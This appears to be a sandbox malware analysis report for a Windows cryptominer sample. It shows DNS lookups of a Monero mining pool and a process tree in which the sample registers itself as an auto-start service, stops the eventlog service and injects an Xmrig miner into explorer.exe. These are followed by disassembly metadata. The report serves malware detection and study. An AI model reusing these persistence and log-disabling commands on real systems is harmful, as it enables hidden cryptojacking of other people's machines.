Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	51.15.58.224	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	51.15.193.130	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	146.59.154.106	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	51.15.65.182	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	212.47.253.124	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	163.172.154.142	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	141.94.23.83	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	54.37.137.114	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	54.37.232.103	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	51.89.23.91	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:41:58.865449905 CET	1.1.1.1	192.168.2.5	0x5627	No error (0)	xmr-eu1.nanopool.org	162.19.224.121	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	16:41:56
Start date:	06/12/2024
Path:	C:\Users\user\Desktop\LfHJdrALlh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\LfHJdrALlh.exe"
Imagebase:	0x7ff612d30000
File size:	2'623'488 bytes
MD5 hash:	17E83A7EF86ED642E8182C051CD382FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:41:56
Start date:	06/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "DQKVOCSM"
Imagebase:	0x7ff6ba9e0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:41:56
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto"
Imagebase:	0x7ff6ba9e0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff6ba9e0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "DQKVOCSM"
Imagebase:	0x7ff6ba9e0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe
Imagebase:	0x7ff621a90000
File size:	2'623'488 bytes
MD5 hash:	17E83A7EF86ED642E8182C051CD382FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	16:41:57
Start date:	06/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.3%
Total number of Nodes:	1272
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF612D31160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF612D31156), ref: 00007FF612D311A5
_amsg_exit.MSVCRT(?,?,?,00007FF612D31156), ref: 00007FF612D311CC
_initterm.MSVCRT ref: 00007FF612D3120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF612D31156), ref: 00007FF612D3124E
malloc.MSVCRT ref: 00007FF612D3127E
strlen.MSVCRT ref: 00007FF612D312A4
malloc.MSVCRT ref: 00007FF612D312B0
memcpy.MSVCRT ref: 00007FF612D312C3
_cexit.MSVCRT(?,?,?,00007FF612D31156), ref: 00007FF612D3132D

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
Instruction ID: f4f1eec81117c3c31074e685518e7588530ba6bbc1351d4cc788973a8c371bea
Opcode Fuzzy Hash: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
Instruction Fuzzy Hash: 065127A5E49E4F85FA10DB25E9513BA23A1BF48FA8F148231C94DC73A1DEBCE441C720

Function 00007FF612D31394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWaitForWorkViaWorkerFactory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF612D31156), ref: 00007FF612D313F7

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: FactoryWaitWorkWorker
String ID:
API String ID: 1653044593-0
Opcode ID: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
Instruction ID: 6ff5bd75b96a944a9fa12996f09ce9c3cd2b4c468f489fdc13fbfc74faac9db7
Opcode Fuzzy Hash: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
Instruction Fuzzy Hash: 6FF0ECB6E0CF4586E610CF51F84006A77A1FB58B98B105635E98C83729CF7CE050CB61

Non-executed Functions

Function 00007FF612D33B30 Relevance: 105.0, APIs: 58, Strings: 1, Instructions: 1749COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF612D33C55
memset.MSVCRT ref: 00007FF612D33D7D
wcscat.MSVCRT ref: 00007FF612D33D8D
memset.MSVCRT ref: 00007FF612D33DA1
wcslen.MSVCRT ref: 00007FF612D33E0A
_wcsnicmp.MSVCRT ref: 00007FF612D33E39
wcslen.MSVCRT ref: 00007FF612D33E49
wcscpy.MSVCRT ref: 00007FF612D33ECA
wcscat.MSVCRT ref: 00007FF612D33ED9
memset.MSVCRT ref: 00007FF612D33EEA
wcscpy.MSVCRT ref: 00007FF612D34012
wcscat.MSVCRT ref: 00007FF612D34021
memset.MSVCRT ref: 00007FF612D34035
wcslen.MSVCRT ref: 00007FF612D34364
_wcsnicmp.MSVCRT ref: 00007FF612D34389
wcslen.MSVCRT ref: 00007FF612D34399
wcscpy.MSVCRT ref: 00007FF612D344C8
wcscat.MSVCRT ref: 00007FF612D344D7
memset.MSVCRT ref: 00007FF612D344EB
wcscpy.MSVCRT ref: 00007FF612D34553
wcscat.MSVCRT ref: 00007FF612D34562
memset.MSVCRT ref: 00007FF612D34576
wcscpy.MSVCRT ref: 00007FF612D345FE
wcscat.MSVCRT ref: 00007FF612D3460D
memset.MSVCRT ref: 00007FF612D34621
wcscpy.MSVCRT ref: 00007FF612D34677
wcscat.MSVCRT ref: 00007FF612D34686
wcslen.MSVCRT ref: 00007FF612D347EA
memset.MSVCRT ref: 00007FF612D3487A
wcslen.MSVCRT ref: 00007FF612D348F1
memset.MSVCRT ref: 00007FF612D34B29
wcscpy.MSVCRT ref: 00007FF612D34B8F
wcscat.MSVCRT ref: 00007FF612D34B9E
_wcsnicmp.MSVCRT ref: 00007FF612D34964

Part of subcall function 00007FF612D32DF0: memset.MSVCRT ref: 00007FF612D32E1D

_wcsicmp.MSVCRT ref: 00007FF612D34D90
memset.MSVCRT ref: 00007FF612D34DAF
wcscpy.MSVCRT ref: 00007FF612D34E10
wcscat.MSVCRT ref: 00007FF612D34E1F
wcslen.MSVCRT ref: 00007FF612D34E32
wcslen.MSVCRT ref: 00007FF612D3520E
wcslen.MSVCRT ref: 00007FF612D3538E
_wcsnicmp.MSVCRT ref: 00007FF612D353B9
wcslen.MSVCRT ref: 00007FF612D353C9
memset.MSVCRT ref: 00007FF612D35528
wcscpy.MSVCRT ref: 00007FF612D35533
wcscat.MSVCRT ref: 00007FF612D35542
memset.MSVCRT ref: 00007FF612D355C2
wcslen.MSVCRT ref: 00007FF612D3562B
_wcsnicmp.MSVCRT ref: 00007FF612D35659
wcslen.MSVCRT ref: 00007FF612D35665
wcscat.MSVCRT ref: 00007FF612D3568C
memset.MSVCRT ref: 00007FF612D356A0
wcscpy.MSVCRT ref: 00007FF612D35733
wcscat.MSVCRT ref: 00007FF612D35742
wcslen.MSVCRT ref: 00007FF612D35A6C
wcslen.MSVCRT ref: 00007FF612D35C1B
memcpy.MSVCRT ref: 00007FF612D35EB6
memcpy.MSVCRT ref: 00007FF612D3618B

Strings

, xrefs: 00007FF612D34EA1

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
String ID:
API String ID: 3604702941-3916222277
Opcode ID: b6f3575da4a60cebb35c731804f48eea7ac295aa7edbb5adab30900fd57ac75a
Instruction ID: 146b4b4052a4ccb43b08f1b2829981f9f1a1c5979c8e56fd545676cba61d65a3
Opcode Fuzzy Hash: b6f3575da4a60cebb35c731804f48eea7ac295aa7edbb5adab30900fd57ac75a
Instruction Fuzzy Hash: 46334AA1D6CECA88F711CB29E8412F56360BF95BACF449331D98CD25A1EFECA244C354

Function 00007FF612D33350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF612D333B2
memset.MSVCRT ref: 00007FF612D33445
wcscpy.MSVCRT ref: 00007FF612D3349D
wcscat.MSVCRT ref: 00007FF612D334A8
wcslen.MSVCRT ref: 00007FF612D334B9
memset.MSVCRT ref: 00007FF612D335D4
wcscpy.MSVCRT ref: 00007FF612D33635
wcscat.MSVCRT ref: 00007FF612D33640
wcslen.MSVCRT ref: 00007FF612D33654

Strings

, xrefs: 00007FF612D336DD
@, xrefs: 00007FF612D334F1
0, xrefs: 00007FF612D334E6
0, xrefs: 00007FF612D3368D
@, xrefs: 00007FF612D33698

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
Instruction ID: 9a9801b0721a84dd4a0d0c00a36713d0778a9ffe67c4d151fd0b671eca346fac
Opcode Fuzzy Hash: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
Instruction Fuzzy Hash: EDB18E62D1CECA85F761CB14E4057AB77A0FB80B6CF104235EA8887AA5DFBDE145CB50

Function 00007FF612D32690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF612D32795
memset.MSVCRT ref: 00007FF612D32865
wcscpy.MSVCRT ref: 00007FF612D328CE
wcscat.MSVCRT ref: 00007FF612D328D9
wcslen.MSVCRT ref: 00007FF612D328E1
wcslen.MSVCRT ref: 00007FF612D328F6
wcslen.MSVCRT ref: 00007FF612D3296D
wcslen.MSVCRT ref: 00007FF612D329E8

Strings

X, xrefs: 00007FF612D32B79
0, xrefs: 00007FF612D3279A
`, xrefs: 00007FF612D32B91

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
Instruction ID: eef5796352d7dce7996ac8c305d85e5242eb076a4bf45e0e68e87db36b71999d
Opcode Fuzzy Hash: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
Instruction Fuzzy Hash: 3B027E62A08FCA85E720CB15E8447AA77A4FB85BA8F104335DA9C877E5DFBCD145C710

Function 00007FF612D31BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF612D391C0,00007FF612D391C0,?,?,00007FF612D30000,?,00007FF612D31991), ref: 00007FF612D31C63
VirtualProtect.KERNEL32(?,?,?,?,00007FF612D391C0,00007FF612D391C0,?,?,00007FF612D30000,?,00007FF612D31991), ref: 00007FF612D31CC7
memcpy.MSVCRT ref: 00007FF612D31CE0
GetLastError.KERNEL32(?,?,?,?,00007FF612D391C0,00007FF612D391C0,?,?,00007FF612D30000,?,00007FF612D31991), ref: 00007FF612D31D23

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF612D31D17
VirtualProtect failed with code 0x%x, xrefs: 00007FF612D31D29
Address %p has no image-section, xrefs: 00007FF612D31CF4

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
Instruction ID: 86b2dd7e357605be484cbf01d11c49d622f83611e8e6aeec1b014bc24a6e551d
Opcode Fuzzy Hash: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
Instruction Fuzzy Hash: 604160A1E09E4B85EA10CB66E8446B967B0FB45FE8F554232CE0DC77A1DEBCE545C320

Function 00007FF612D32104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF612D32118
TlsGetValue.KERNEL32 ref: 00007FF612D3214F
GetLastError.KERNEL32 ref: 00007FF612D32154
LeaveCriticalSection.KERNEL32 ref: 00007FF612D32212
free.MSVCRT ref: 00007FF612D32234
DeleteCriticalSection.KERNEL32 ref: 00007FF612D3225D

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
Instruction ID: 10bad2e3b345b0ebe0d415e210ed6bba9e356372f413cfecef8495389efcb911
Opcode Fuzzy Hash: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
Instruction Fuzzy Hash: CF21E7A5E49D0A85FA19CB11E9483752260BF01FBCF658631CD1EC7AA4DFACBC46C320

Function 00007FF612D31E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 00007FF612D31E27

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
Instruction ID: 6b906e74bd541b1d5ac6e5096382a324d135e355de52ab9fddb503773fc0a67f
Opcode Fuzzy Hash: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
Instruction Fuzzy Hash: 1B2148A6E0CD0F42FA698264D59037912A1BF84FBCF258731D90DC32D4DEACE8828260

Function 00007FF612D31880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF612D31247), ref: 00007FF612D319F9

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF612D31B7B
Unknown pseudo relocation protocol version %d., xrefs: 00007FF612D31B8B

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

